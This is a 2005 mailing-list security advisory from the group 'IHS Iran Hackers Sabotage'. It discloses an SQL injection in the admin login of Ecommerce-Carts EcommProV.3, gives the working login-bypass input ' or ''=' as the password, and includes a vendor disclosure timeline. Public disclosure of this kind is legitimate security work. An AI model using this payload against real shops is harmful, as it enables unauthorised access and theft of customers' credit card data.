Date: Wed, 20 Apr 2005 01:42:19 +0430 (IRDT)
Subject: Ecommerce-Carts SQL injection vulnerability ( IHSTeam )
From: [email protected]
To: [email protected]
User-Agent: SquirrelMail/1.4.4
MIME-Version: 1.0
Content-Type: text/plain;charset=iso-8859-1
Content-Transfer-Encoding: 8bit
X-Priority: 3 (Normal)
Importance: Normal
X-AntiAbuse: This header was added to track abuse, please include it with any abuse report
X-AntiAbuse: Primary Hostname - hossein.emami.bistgani
X-AntiAbuse: Original Domain - securityfocus.com
X-AntiAbuse: Originator/Caller UID/GID - [1017 1018] / [26 6]
X-AntiAbuse: Sender Address Domain - ihsteam.com
X-Source:
X-Source-Args:
X-Source-Dir:
X-Virus-Scanned: antivirus-gw at tyumen.ru
********************************************
IHS Iran Hackers Sabotage Public advisory
by : c0d3r "Kaveh Razavi" [email protected]
********************************************
----------------------------------------------------------
advisory url :
http://www.ihssecurity.com/cms/modules/mydownloads/visit.php?lid=8
application : Ecommerce-Carts EcommProV.3 and prior
vender : Ecommerce-Carts.com
risk : critical
Ecommerce-Carts is a web application that is used to manage small
businesses .
it has got many useful features like credit card process and etc .
Ecommerce-Carts contain a very dangrous sql injection which allow attacker
to gain access to
control panel page and view critical information like credit card
information and so on .
the vulnerability is quite simple to use :
http://site.com/scart/admin/login.asp
user : admin ( everything )
pass : ' or ''='
----------------------------------------------------------
Disclosure timeline :
14 April 2005 : vender contacted via a private mail
16 April 2005 : vender contacted again ( no response )
19 April 2005 : still no response , public disclosure
----------------------------------------------------------
greeting to IHSteam.com members and exploitdev mates and all Iranian
Security Teams
c0d3r of IHS
Security researcher
Www.ihssecurity.com (english)
www.ihsteam.com (persian)
